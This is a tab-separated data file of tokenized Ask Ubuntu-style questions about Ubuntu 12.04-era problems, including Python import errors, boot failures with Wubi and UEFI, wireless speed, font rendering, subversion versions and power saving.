161876	puimporterror : no module named pyexpat	whenever i try to launch 'hotot ' i get this errors . this error also appears if i try something stupid in terminal along with `` no module named gdm '' error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 1 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 16 , in < module > from xml.parsers.expat import expaterror file `` /usr/lib/python2.7/xml/parsers/expat.py '' , line 4 , in < module > from pyexpat import * importerror : no module named pyexpat i am on ubuntu 12.04 python 2.7.3 . i found similar problem here https : //github.com/kindari/sublimexdebug/issues/5 but did not work . as asked below i am inserting this too ls /usr/lib/python2.7/lib-dynload/ audioop.so _codecs_cn.so _codecs_jp.so crypt.so _ctypes_test.so _elementtree.so _io.so _multibytecodec.so _sqlite3.so _bsddb.so _codecs_hk.so _codecs_kr.so _csv.so _curses_panel.so _heapq.so _json.so _multiprocessing.so _testcapi.so bz2.so _codecs_iso2022.so _codecs_tw.so _ctypes.so _curses.so _hotshot.so _lsprof.so python-2.7.egg-info
161878	when will the `` artfwo '' ppa be updated for 12.04 precise ?	http : //ppa.launchpad.net/artfwo/ppa/ubuntu/dists/precise/ does not exits so the packages that are supposed to be in that folder are not available . ... /precise/main/source/sources ... /precise/main/binary-amd64/packages ... /precise/main/binary-i386/packages will these packages be restored ?
161879	fonts look squashed or stretched in the browser on ubuntu	fonts in the browser on ubuntu look look squashed/stretched compared to windows/osx . this image shows exactly what i mean : http : //i.stack.imgur.com/suuxx.png i installed msttcorefonts and configured both chrome & ff to use microsoft fonts ( arial , times new roman ) instead of the default ones . while ms fonts made web pages appear a bit different , regardless of what font it was the squashed/stretched look remained . freesans looks a little different from arial , but it too is rendered squashed/stretched like arial on both ff & chrome . opera renders the wikipedia page differently from ff & chrome , but the fonts looks squashed/stretched on it as well . i used to run kubuntu prior to switching to ubuntu and at some point i managed to get the fonts on chrome ( only chrome ) look exactly like in the image on the left . i have no idea how i did it though . firefox and rekonq retained the squashed/stretched look . i had been using rekonq for a while , then switched to ff . while using both browsers i had done various things to get the fonts to look better on them with no success - like installing ms fonts & configuring both browsers to use them . i then , after some time , installed chrome and the fonts magically looked perfect on them - just like on right-hand side of the image . in fact , the font smoothing looked better ( to my eye ) compared to windows and osx . all 3 oses use subtly different font smoothing strategies and the differences stand out . later , i formatted & installed ubuntu 12.04 . the first thing i did was install msttcorefonts & then install chrome . to my dismay , the fonts on chrome looked just as squashed/stretched as it did in firefox . there 's no browser ( except wine internet explorer ) that renders fonts properly on my ubuntu setup right now . fixing this is definitely possible , since i was able to do it on kubuntu , but apparently it requires some mysterious tweaking . would anyone be willing to help me out ?
161881	how to install skype 4 without internet ?	i was already download skype 4 from official website ( .deb ) when i double click and trying to install it with software center it trying to download it from the internet . ( and i guess the older version ) because im new in ubuntu - that behavior totally strange for me . so ... why it acting like that and how to install that version from official website ? thx
161885	xubuntu 12.04 totally refuses to boot after install with wubi on old computer . any tips or suggestions on things i can do to fix this problem ?	i downloaded xubuntu 12.04 32-bit ( the desktop cd iso , not the alternate cd ) from xubuntu.org and placed the .zip into a folder named xubuntu on my desktop . then i extracted the files to that folder and ran wubi . i selected xubuntu from the drop down menu and clicked install . i let it do it 's thing and then chose the option to reboot when prompted . this is when i went to my girlfriend 's house for the day and left my laptop ( dell latitude 120l ) to finish the install . i came back home ( about 8 hours later ) to find my computer on the windows 7 log in screen when i rebooted my computer once more . i booted xubuntu just fine and things seemed to work perfectly . i turned off the pc and went to bed . next morning i booted xubuntu again without problems . i rebooted and went to windows , then next time i tried booting xubuntu in the middle of the splash screen it went black and the cpu light stopped blinking . i force shut down the computer and tried booting again when the same thing happened ( instead of going black the splash just froze ) . i went back to windows and uninstalled and reinstalled the os and havent been able to boot it since . i even tried booting kubuntu with the same problem .
161888	how to get the update manager window visible ?	i can see from the launcher that the update manager is running - it has the little triangle by it . however , i am having trouble seeing the window . if i click on it from one desktop , it switches to another , so i assume that the update manager has its window on that other desktop , but it still does n't show anything . if i click alt-tab to switch between apps , i can see that the update manager is there , but selecting it just shows me a blank screen . also , when i select it , while still holding the alt-key , i see the top menu bar switch to 'update manager ' , but when i release alt , it changes back to ubuntu desktop . it 's almost like the app is off the screen somewhere , perhaps with just a single pixel showing or something like that . disclaimer : one thing that might be affecting things is that i have 'focus follows mouse ' configured , which makes things a bit funky with the menu not being on the window , where it should be ( perhaps there 's a way to put it back with the window ? ) - i like to be able to type into background windows , and manually control which window is in the foreground .
161889	ubuntu 11.04 windows xp dual boot problem	i have installed ubuntu 11.04 direct from installation disk in a separate partition alongside an existing windows xp installation . ubuntu operates fine . i can see the old xp file system and the other network computer and access the internet . the problem is when the computer starts i get the boot selection list for ubuntu or xp ; but i am not allowed to select windows xp ( i can not scroll down the list with tab or arrows keys ) . this would be fine for me but the computer is used by other people who are only familiar with windows xp at the moment . i have downloaded and run boot repair . here are the resulting data .
161895	how do i recover deleted files ?	i accidentally deleted a folder that contain all my work , almost 2k , when i recovered it from the trash can , the folder was recovered , but empty , there is nothing inside , how can i recover all my files ?
161896	it is possible to set the high of the cinnamon bottom panel to 40 px ?	changing the value in an cinammon theme does n't work correctly . i use cinnamon 1.4 ( ubuntu 12.04 ) .
161904	in launcher , disable the music suggestion section	everytime i want to launch an office program , i begin typing `` of '' in the launcher , and ... pictures of lightly-clothed ladies show up . not the end of the world , but because i do this a lot in front of customers and bosses , it is often embarrassing . i have already disabled zeitgeist and `` recently used '' . banshee does not have any zeitgeist item in edit > preferences > extensions . is there a way to disable this `` music '' section in the launcher suggestions ? or maybe i just must stop playing dance music via banshee ...
161906	software center crashes upon openinig in 12.04 - no error message	i just completed a fresh install of 12.04 . i logged in and tried to open the software center - it opens for only a few seconds , then it closes . it happens whether i am in the root account or guest account . there is no error message provided either .
161912	bzr : change saved location	how can i change the saved location of repository when using bzr ? when you do : bzr push , it 's normally what you can see : using saved push location : bzr+ssh : //bazaar.launchpad.net/xx
161915	which are the core libraries in ubuntu ?	what are core libraries in ubuntu ? i mean libraries where the apis and abis are preserved across major releases , like 12.04 lts , 14.04 lts and 16.06 lts . what is the core of ubuntu and what is the policy on how many releases api and abi are kept stable ? here is example documentation from red hat , i did n't find yet equivalent documentation for ubuntu .
161921	note taking software that supports images	is there a note taking software that supports image insertion ? and best with font changing of area texts . i use tomboy before , that has no image support . thanks .
161924	how do i set persistent environment variables for root ?	to create persistent environment variables , i add the script file to /etc/profile.d directory , for example : # my script export my_var=var_value this works properly for current user : alex @ alex-64 : ~ $ echo $ my_var var_value now i need the same environment variables for the root user , but /etc/profile.d script does n't work for root : alex @ alex-64 : ~ $ echo $ my_var var_value alex @ alex-64 : ~ $ sudo su root @ alex-64 : /home/alex # echo $ my_var root @ alex-64 : /home/alex # how can i set the same variables for the root ?
161928	how to make browser video go fullscreen	i have been trying to watch videos in my browser on fullscreen . for example : http : //www.nhs.uk/video/pages/glueearanimation.aspx ? searchtype=search & searchterm=glue+ear & offset=1 & but also youtube videos have trouble , though with the latter i can usually get it to 'stick ' fullscreen if i keep trying enough times . what happens is that the video goes fullscreen for just a moment , then goes back to its previous size/position embedded in the browser . using the above url , using either the fullscreen button , or the 'go fullscreen ' menu option , has the same errant effect . i 'm using firefox 13.01 and flash version 11,2,202,236 , on ubuntu 12.04 .
161931	why is wireless slow with atheros ar9285 ?	i know there are many posts like this , however none of the fixes i have found have worked . i had the issue on 11.04 , and after having no luck fixing it decided to try 12.04 however this has not fixed the problem . i 'm using a lenovo ideapad , the network card is a atheros communications ar9285 . edit add outputs : sudo iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' netgear-plow '' mode : managed frequency:2.437 ghz access point : e0:91 : f5:7d:1b : ba bit rate=65 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=66/70 signal level=-44 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:77 invalid misc:63 missed beacon:0 eth0 no wireless extensions . lspci -nnk | grep -ia2 net 06:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : lenovo device [ 17aa:30a1 ] kernel driver in use : ath9k -- 07:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : lenovo device [ 17aa:392e ] kernel driver in use : r8169 thanks
161933	how can i organize games ?	i am running 12.04 and am wondering if there is a way to organize games so that when i click on my `` games '' folder in the menu bar , all of my games will be in there .
161935	how do i log all input and output in a terminal session ?	how do i keep logs of all the work done via terminal ? for example , i want a record of all the work done on database via terminal .
161940	capturing video from webcam and saving to a file	i am trying to capture video ( alongwith audio ) from a webcam . i need to record the video and save it to a file , for further processing . would like to do it through cli . any ideas how to do it using ffmpeg or gstreamer . i am getting these errors : 1.gstreamer : - erroneous pipeline : no element `` xvimagesink '' . 2.ffmpeg : - unable to find suitable output format for video4linux2 . any help is appreciated .
161955	how do i get skype 4.0 to open multiple chat windows ?	since skype 4.0 i 'm not able to open more than one chat window . if i want to chat with more than one person i have to close person one 's chat window and open one with person two . even if i click on person two 's entry in the contact list and click on `` chat '' the window of person one will be replaced with person two 's chat window . i suspect there is an option in the preferences o change this obnoxious behavior but i ca n't seem to find it . so how do i have skype 4.0 open a separate chat window every person without replacing the old one ? again this problem is new in 4.0 , i.e . 2.0 beta did n't have that problem .
161962	how to display free disk space in lubuntu/lxde ?	in xubuntu/xfce the xfpanel has an add-on for that ( free space checker ) . is there something similar for lxpanel or otherwise in lxde/lubuntu - or maybe a program with a similar service for all ubuntu family or even for all linux ?
161963	are the source repositories required for a normal user ?	it was always my impression that ubuntu was a binary package distro and that developer sources for various packages were supplied in separate sources repos , if required . it seems that my sources.list file is littered with source repos . indeed , if adding a package repository via update manager preferences , it automatically includes the sources repo into my sources.list . this is killing my update times and leads me to believe that my apt sources.list is very wrong indeed . my question is : are the source repositories required for anybody who just wants to run software and not compile it themselves ?
161964	is the intel thunderbolt interface supported in ubuntu 12.04 ?	i was searching the web around one hour now , but still could not find a definite answer : is intel thunderbolt already working with linux ? i am especially interested in networking , so that i can transfer files from a mac osx machine to an ubuntu ( intel dz77re-75k or gigabyte z77x-up5 ) machine . any news/information on ubuntu and linux kernel support for thunderbolt ?
161966	how do i uninstall the tuxonice kernel in 12.04 ?	i recently installed tuxonice on a toshiba z830 . i have ubuntu 12.04 ( kernel was : 3.2.0-26 ) i wanted to be able to hibernate , which i consider to be a basic thing a os should allow you to do . well , it did n't work ... but they already tell you it may not so i removed it . for doing all these i followed : problem with hibernation after uninstalling i switched off the laptop and after this i started to have several problems . the first one was that cisco vpn did n't work anymore and then i realised that i could not even suspend my laptop . i found very strange that after removing tuxonice i still had this : /lib/modules/3.2.0-26-generic-tuxonice/ the vpn problem could be solved by just copying from my previous kernel : 3.2.0-26-generic/ciscovpn/ into the tuxonice one . not very elegant but works . now , for the suspend problem ( and the previous too ) i can hold shift when starting and select my old kernel and then suspend works again . in my opinion tuxonice was not correctly uninstalled as it left that kernel behind and worse : ubuntu uses it if i do not take action . i have these work arounds ... .and here is my question : how can i delete this tuxonice kernel safely ? if you need more info please let me know .
161972	is gnome dpi aware ?	is gnome fully dpi aware ? i do n't mean only fonts but also widgets like buttons , window borders etc .
161974	how to backup encrypted home in encrypted form only ?	i want to backup the encrypted home of a user who might be logged in at backup time . which directories should i backup if i want to ensure that absolutely no plaintext data can be leaked ? are the following folders always encrypted ? /home/user/.private /home/user/.ecryptfs just want to make sure that no data leaks , as the backup destination is untrustworthy . edit : yes , as lord of time has suggested , i 'd like to know which folders and/or files i need to backup if i need to store only encrypted content in a way that allows me to recover it later with the right passphrase .
161984	suspend & hibernate not working on a toshiba satellite l300	i am using toshiba satellite l300 . installed ubuntu 12.04 as fresh install . just after the installation , i tried hibernating the system using command pm-hibernate , which went well . the suspend too worked automatically . two days ago , i found that the suspend is n't working . the suspend button takes to the resume screen . the same with hibernate . i suspected a kernel update has caused this . but booting into older kernels is n't helping . hate toshiba for making laptops incompatible with ubuntu . but can anyone suggest any fix for this problem for now . thanks in advance .
161989	can i have multiple user accounts in ubuntu 12.04 lts ?	can i have multiple user accounts in ubuntu 12.04 lts ? if so , how can i do it ?
161997	unable to install ubuntu 12.04 - acer aspire 5750g	i have a acer aspire 5750g . i installed ubuntu 12.04 - 64 bit as a dual boot onto my c : drive using wubi ( or whatever its called ) but i could n't load windows after it and formatted my laptop ( later finding out that i could have just rearranged by mbr ) . i am now trying to install it to a partition ( u : drive ) and when i try to install ubuntu it glitches out and says unable to download/load some file . i have tried downloading whole iso and burning containing file to disk along with trying just the iso and using wubi and no matter what i do it wo n't install and i always get the same error . i am unable to boot using a disk ( not sure if its just a issue with my laptop or because its a rental from radio rentals ) but i have tried many other work arounds
161999	how to open a directory with spaces in its name from the terminal ?	i am trying to open dir in terminator , but when i want to open dir that consists of two or more words i get error message like this : bash : cd : /home/kudic/radna : there is no directory radna the error message is on croatian language so i have translated it . the name of dir i want to open is : radna površina
162000	cryptroot error during boot	after some time on ubuntu 12.04 ( sure not since the first intallation ) i noticed the following error on boot : begin : running /scripts/local-top ... /scripts/local-top/cryptroot : line 24 : dirname : not found edit : content of /usr/share/initramfs-tools/scripts/local-top/cryptroot is here : http : //pastebin.com/pf1prrvl i 'm not using encryption , because sudo dmsetup status gives no devices found
162011	synaptic wo n't launch from menu in panel in fresh lubuntu minimal desktop 12.04 install	i performed a fresh install of lubuntu 12.04 with minimal desktop , as described here . to clarify , i did a command-line install from the lubuntu alternative install disc , then i did an apt-get install -- no-install-recommends lubuntu-desktop . everything is working fine , except that synaptic will not run from the menu entry in the panel . i am not prompted for a password , and no window of any sort appears after clicking the menu entry . i installed lxshortcut to see what the shortcut was running , and the command is synaptic-pkexec . if i type this command into the `` run '' menu , i get the same behavior ( or lack thereof ) . i can get synaptic to open up just fine by typing gksudo synaptic at the `` run '' menu . also , if i run `` synaptic-pkexec '' from the terminal , then i am prompted for my password within the terminal , and after that synaptic opens normally . can someone please suggest the right way to get synaptic working ? i could just change the menu entry to `` gksudo synaptic '' , but i 'm guessing that it 's set to synaptic-pkexec for a reason . i have a vague understanding that this pkexec business has something to do with policykit , but i do n't really know what policykit is or how to tell if something is broken with it .
162012	problems with installation of ubuntu 12.04 ( 64 and 32 bits )	i am a latinoamerican so.. sorry for my english i am trying to install ubuntu on my new pc but i have serious problems . when i put the installation cd and it runs , everything goes fine until that `` window '' when the user have to decide if want to try ubuntu or install it on the machine.. well that `` window '' apears in blank , and i see that my mouse and my keyboard turn really slowly and i ca n't do anything i have to shut it down by pressing power botton . the specification of my pc are this gigabyte ex58 ud7 i7 950 wester digital caviar black 6gb memory corsair evga gtx580 please i really neeed to install ubuntu or another linux distrubution , i am usign de sismic unix program on my laptop and well . it burns when i program a script ! help ! please : ) what can i do.. ? what i have to download ? i am not a pro in linux so please : ( be pattient with me when it starts to load the achieve ubuntu environment to enter a menu with a graphical environment but i managed to get something sturdy and gave him to try ubuntu , started to load but freezes on the sign of ubuntu with red spots and only shows me the pointer not more ... .. any other option ? ps : had previously tried to install the alternate version of ubuntu not having success : s
162015	knetworkmanager not starting at all	it seems that my knetworkmanager is not starting anymore . read : in kde4 's sys tray i do n't have a icon to manage my networks . also when starting it from terminal or kick off menu literally `` nothing '' happens . i do n't know what 's wrong with it . i tried to start it via alt + f2 - also nothing . maybe also worth to note that in the terminal no error occurs , the command return ready for the next input , not the slightest error message . 贸_o ? sadly after reading this answer on superuser.com it seems i can not connect to wifi via iwconfig 'cause my network is wpa2 encrypted . ( basically i can not set they passphrase - > invalid argumenterror . ) so it seems i 've to get knetworkmanger running again as i also ca n't download other tools . i 've tried stuff like sudo service network-manager restart but it did n't seem to help . i 'm kinda puzzled so any help for this would be appreciated . ps : if it has n't become clear : the whole drama of is simply i ca n't connect to wifi and internet : o ) edit : as suggested i tried to reinstall network-manager-kde* and it is pretty much the same except one difference : it said something about a something.so library . sadly i could n't save the something because the usb flash drive is mounted as read only ( another issue i have -sight- ) . ( it was a 2 liner and continued stating to switch back do some q-foo ... default mode hence i reckon the manager has started up no visual reference ( systray icon ) ) . however , notice that upon observing this i have re-uninstalled and re-re-installed the network manager to see if i could reproduce the error but no luck . have n't tried rebooting though as i 'm downloading a new ubuntu image and properly just upgrade the full system after saving /home . *if you run into the same situation : need to install something without having network access : google the package name and download it from ubuntu make sure to select the right version though ! in my case i got a .deb file which i simply copied on my usb stick and installed it on the system via double click in the file manager ( doplhin in my case ) . so do n't panic if you run into these troubles ! : )
162021	ubuntu 12.04 freezing on startup	have been looking everywhere to find a solution to this problem but have yet to find a solution . i am running 64 bit 12.04 lts on a amd c-50 dual core 6 gigs ram amd ratheon hd 6250 . the problem i am experiencing is when ubuntu gets to the wallpaper screen it will sometimes freeze soon after the the image appears or shortly there after gnome loads locking up keyboard and mouse . when i try to log in via the console the same thing happens ( this is as ubuntu is loading ) . at the moment the system is set to auto login previously it was set to ask for password but it did the same thing . switching to from lightdm to gdm did nothing to alleviate the issue . i have never had so many issues with ubuntu i have to say 12.04 is the most buggy version yet .
162023	lv2 and lv2-dev libraries or equivalent	i 'm compiling ardour3 from source and as far as i can tell i have all the libraries mentioned in http : //ardour.org/building_ardour3 unfortunately running ./waf configure gives the following error checking for 'lv2 ' > = 1.0.0 : not found i have the following packages installed that look useful but do n't seem to help : i lv2-c++-tools - library and tools for lv2 plugins i lv2-extensions-good - lv2 extensions from the `` good '' set i a lv2core - lv2 audio plugin specification i lv2fil - stereo and mono lv2 plugins , four-band par i lv2file - command-line program to apply lv2 effects i lv2proc - command line effect processor i lv2vocoder - lv2 vocoder plugin where can i find that library . i 'm okay with compiling it myself . apparently there is a package in sid : http : //packages.debian.org/sid/lv2-dev i 'll try getting that in a while the source code can be had via subversion : svn co http : //subversion.ardour.org/svn/ardour2/branches/3.0
162028	how to use shortcuts to switch between displays in lxde ?	i mean to switch between the laptop monitor and an external display . i edited /home/user/.config/openbox/lubuntu-rc.xml file to set shortcuts but how to do it for this specific purpose ?
162032	can i use gwibber to access linkedin ?	i installed ubuntu for the first time a couple of days ago so i 'm just getting set up . i 'm not a big social media user but i do use fb and linked in a bit . gwibber seems to work for fb but not for linkedin . is there a way i can configure something to make it work or is there an alternate client i should be looking at ? thanks martin
162033	how can i synchronize podcasts using ubuntu one ?	i use rhythmbox 's podcast feature , to automatically download new podcast episodes from feeds which i 've subscribed to . i also happen to use ubuntu on several computers , all synced to the same ubuntu one account . what i want to do , is to synchronize downloaded podcasts as well as rhythmbox 's list of podcast subscriptions between my computers , so that the podcast view in rhythmbox appear the same on all computers . how can i do that ?
162034	how do i remove an existing built package from a ppa ?	is it possible to drop built package from a ppa ? without dropping the whole ppa ? there 's multiple package inside ( not multiple version ) , i just want to remove one of them .
162035	os x keyboard layout in unity or ubuntu	i want to use all of the mac keyboard shortcuts for everything in unity . example : copy ( cmd+c ) , paste ( cmd+p ) , etc . i have not found a way to do this where cmd is the modifier key instead of ctrl , whilst ctrl still acts `` normal '' in terminal ( say quitting a process with ctrl+c ) . any ideas ?
162037	how to edit pdfs ?	i typically have two needs : scenario a . change a single pdf page . in this case i have a pdf but not the original source file used to create the pdf . i do n't want to try to recreate the document from scratch . i 'd like to open the pdf and change a few things . a good example of this scenario : i was responsible for planning a big event at a campground site , i had a pdf of the site . i wanted to start with that document , highlight some parts , add some labels , remove some parts that were n't relevant . or scenario b . combine pdfs or extract page ( s ) from a pdf this scenario usually arises because i want a single pdf deliverable that is made up of parts that are best created in different programs . in this case i have the source files for all the documents but they do n't play well enough together to easily create a single pdf deliverable . for part of it , i may want to use libre office writer . for another page i may want to use gimp . still another page i may use libre office calc . i could use writer as the master document and embed images or the calc object into that , but for ultimate control , you ca n't beat separate pdf documents that are then combined . what are the best tools / processes for editing pdfs in ubuntu ?
162041	why has n't ubuntu packaged a more recent version of gdm ?	i 'm not sure if anyone would have the answer to this , but it seems a little odd to me that ubuntu does n't package the latest stable version of gdm considering gnome-shell version 3.4 was packaged in the precise release . i know it 's not a massive question , but i 'm intrigued to know why this has n't been included in the repos . i would imagine that some people want to full gnome experience and ubuntu just is n't giving it to them .
162044	how to turn ibus input method on after installing ibus-m17n for bengali-avro ?	i have installed ibus-m17n from software center . selected and added bengali-avro in input method under ibus preferences . ibus was added to the startup applications in power cog menu . in the language support , keyboard input method is set to ibus . it is seen from the top panel of ibus-bengali-avro and the input method is off . no change after pressing ctrl + spacebar .
162045	how can i radically mimimize power usage when i need to conserve battery ?	i often work from locations where i do n't have a way to plug in my laptop and i need to get some single thing done . i 'm looking for some good strategies that i could use to shut off all the processes i do n't need ( local apache server , mysql and postgres ) when i know i wo n't have a way to plug in for a while , but restore them when i do have power and would prefer to have my full development environment available . how do other people manage this ? do background database servers use enough power for this to be worth doing ? i 've got a thinkpad x301 , running 11.10 . if that makes any difference . here 's what powertop says is using power now : the battery reports a discharge rate of 11.5 w summary : 1113.1 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec usage events/s category description 4988 rpm device laptop fan 50.9 ms/s 267.3 process /usr/lib/firefox/firefox http : //t.co/xxxx 3.6 ms/s 228.3 timer hrtimer_wakeup 106.0 ms/s 87.8 process /opt/tweetdeck/bin/tweetdeck 22.6 ms/s 110.2 process /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -backgrou 7.8 ms/s 74.1 process /usr/bin/gtk-gnash -u http : //a.vimeocdn.com/p/flash/moogalover/1.1.19/moogalover.swf 7.6 ms/s 59.5 process /usr/bin/gtk-gnash -u http : //service.twistage.com/plugins/player.swf -u http : //servi 0.9 ms/s 47.8 interrupt ps/2 touchpad / keyboard / mouse 3.3 ms/s 17.6 process /usr/bin/python /usr/lib/desktopcouch/desktopcouch-service 7.2 ms/s 13.7 process compiz 0.8 ms/s 14.6 interrupt [ 6 ] tasklet ( softirq ) 1.0 ms/s 13.7 interrupt [ 44 ] i915 431.9 µs/s 10.7 process postgres : writer process 1.2 ms/s 9.8 timer tick_sched_timer 670.7 µs/s 9.8 process nautilus -n 182.9 µs/s 9.8 kwork ieee80211_iface_work i can see a few things to kill ( tweetdeck and the firefox tabs with flash in them ) , desktopcouch , ubuntuone , but those gtkgnash processes do n't disappear when i stop firefox .
162046	i am having difficulties installing ubuntu , i get a black screen with a flashing underscore	i 'm trying to install ubuntu 12.04 to my secondary hard drive , but whenever i select `` install ubuntu '' or `` try ubuntu without installing '' it goes to a black screen with what looks to be a flashing underscore . no matter how long i leave it it does not progress any further . a video i just took of it happening : youtu.be/qmf2drxu858 what am i doing something wrong ? how may i fix it ? i feel like the problem rests in my graphics card . should i try installing it via wubi ? could i later turn that into a full install ? if it matters , my set up : i5 2400k 3.1ghz 8gb ddr3 1333mhz ram 2tb seagate / 500gb wd caviar blue nvidia evga 550ti 1gb video ram asus mobo
162047	how to install kubuntu 12.04 amd64 on an asus n56v notebook	solved i 'm trying to install kubuntu alogng with the preinstalled windows 7 . i boot from cd create three partititons : / ( ext4 ) , swap and a 100mb reserved bios all installs correctly , but i 'm not able to boot kubuntu from the bios setup disappeared the option to use legacy bios instead of uefi ( or at least i can not find it ) i have the option to create a new boot entry , but i do n't know what to type in . what can i do ? thanks mirto =========== added 10 lug 18:54 ======================== seems relate to bug 972122 ( https : // bugs.launchpad.net/ubuntu/+source/partman-efi/+bug/972122 ) the message i saw when the efi boot partition was missing is the same reported in https : // launchpadlibrarian.net/99750202/efi-warning.jpg the bug is marked as fixed-released what i 'm missing ? there is any particular install cd using partman-efi ? ============== added 12 lug 18:27 ========================= i 've tried boot-repair using a ubuntu-secure-remix - i updated boot-repair before using it . i 've sent the error output posted at http : //paste.ubuntu.com/1088164/ to boot.repair @ gmail com boot-repair is suggesting other actions and i 'll try ============= added 12 lug 19:23 ========================== second try : non luck log at http : //paste.ubuntu.com/1088300/ ============= added 13 lug 18:05 ========================== at power-on magically the ubuntu boot entry appeared boot-repair was the solution
162051	not sure about intel integrated graphics	i have a sony vaio laptop with an i5 460m cpu and a nvidia 310m graphics card . there was no mention by sony about support for hybrid graphics ( specifically nvidia optimus ) , but the processor does have integrated graphics , according to the intel web site . however , in the output of lspci -v | grep vga there is only the entry for the nvidia dedicated card : 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 310m ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) on the other hand , ubuntu seems to be trying to load some intel/graphics related modules , since i get the failed to get i915 symbols , graphics turbo disabled error during boot . therefore , i 'd like to know if there is the possibility of using the intel graphics , with bumblebee , or is it safe to remove the modules from boot ( it slows down boot for a few seconds ) . any help will be appreciated !
162052	why does `` ~ '' folder in my home directory keep reappearing ?	i noticed there is a folder titled `` ~ '' - no quotes , in my home directory . if i delete it , it instantly reappears . why is this there and how can i make it go away ?
162058	how do i install jdownloader ?	i want to install using a script but the problem i do n't know how to using this method to get a install . try out our new install/start-script for linux/mac ! wget must be installed on system ! download jd.sh chmod +x jd.sh start jd.sh note : open jd.sh to read manual or change settings ! please teach me and give me a detail to get the jdownloader install .
162060	what if svn repository is too recent for subversion client which is itself `` up to date '' ?	something unexpected is happening ... i have upgraded some svn repositories lately . now when i 'm on ubuntu , i get the following when i try updating them : max @ asusn73s : ~/d/some/repos $ svn up svn : the path ' . ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . so , yup , i had to update tortoise on windows because of that , so i updated tortoise and it worked . no i try updating subversion on ubuntu to bring it up to speed , but here 's what i get : max @ asusn73s : ~/d/some/repos $ sudo apt-get install subversion reading package lists ... done building dependency tree reading state information ... done subversion is already the newest version . the following packages were automatically installed and are no longer required : libatk1.0-0 : i386 libxcomposite1 : i386 nspluginwrapper libnspr4-0d : i386 libcairo2 : i386 libdatrie1 : i386 libgdk-pixbuf2.0-0 : i386 libpixman-1-0 : i386 libxinerama1 : i386 nspluginviewer : i386 libxft2 : i386 libthai0 : i386 libjasper1 : i386 libpango1.0-0 : i386 libxcb-render0 : i386 libxcursor1 : i386 libxcb-shm0 : i386 libxrandr2 : i386 libnss3-1d : i386 libgtk2.0-0 : i386 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . subversion already up to date ? nope ! : max @ asusn73s : ~/d/some/repos $ svn -- version -- quiet 1.6.12 i already ran an apt-get update command . i do n't remember having changed the sources.list file on this installation , but i might be wrong . in case it would be relevant , here it is : # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / dists/oneiric/main/binary-i386/ # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / oneiric main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ca.archive.ubuntu.com/ubuntu/ oneiric main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ oneiric main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //ca.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ oneiric universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ oneiric universe deb http : //ca.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ oneiric-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ca.archive.ubuntu.com/ubuntu/ oneiric multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //ca.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ oneiric-backports main restricted universe multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ oneiric-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb http : //security.ubuntu.com/ubuntu oneiric-security universe deb-src http : //security.ubuntu.com/ubuntu oneiric-security universe deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb-src http : //security.ubuntu.com/ubuntu oneiric-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu oneiric main deb-src http : //extras.ubuntu.com/ubuntu oneiric main version : max @ asusn73s : /etc/apt $ cat /proc/version linux version 3.0.0-22-generic ( buildd @ komainu ) ( gcc version 4.6.1 ( ubuntu/linaro 4.6.1-9ubuntu3 ) ) # 36-ubuntu smp tue jun 12 17:37:42 utc 2012 any help is greatly appreciated ! thanks !
